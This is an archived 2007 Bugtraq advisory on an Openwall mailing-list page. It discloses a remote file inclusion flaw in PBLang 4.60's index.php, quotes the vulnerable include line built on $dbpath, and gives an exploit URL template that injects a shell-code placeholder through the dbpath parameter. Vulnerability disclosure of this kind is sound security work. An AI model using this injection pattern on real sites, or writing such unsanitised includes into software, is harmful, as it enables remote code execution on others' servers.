lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY20-F8C5E2CFB15597271F541BBF950@phx.gbl>
Date: Fri, 16 Feb 2007 13:38:45 +0000
From: "me you" <r.5.7@...mail.com>
To: submit@...w0rm.com
Cc: bugtraq@...urityfocus.com
Subject: PBLang 4.60 <= (index.php) Remote File Include Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++

PBLang 4.60 <= (index.php) Remote File Include Vulnerability

Script: PBLang

Version: 4.60

URL: 
http://downloads.sourceforge.net/pblang/PBL465_nographics.zip?modtime=1098268125&big_mirror=0

Found By: BorN To K!LL

+++++++++++++++++++++++++++++++++++++++++++++++++++++++

Bug in:

index.php .....

Bug code:

include($dbpath."/settings/styles/styles.php");

+++++++++++++++++++++++++++++++++++++++++++++++++++++++

ExploiT:
~~~~~
www.site.com/[path]/index.php?dbpath=[SHeLL-Code]

+++++++++++++++++++++++++++++++++++++++++++++++++++++++

GreeTz To:
Dr.2  ,  AsbMay  ,  General C  ,  str0ke  ,  SHiKaA  ,  ThE-LoRd-Of-CrAcKiNg

AsbMay's Group ..  KuW SeC TeaM .....

+++++++++++++++++++++++++++++++++++++++++++++++++++++++

_________________________________________________________________
Don't just search. Find. Check out the new MSN Search! 
http://search.msn.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ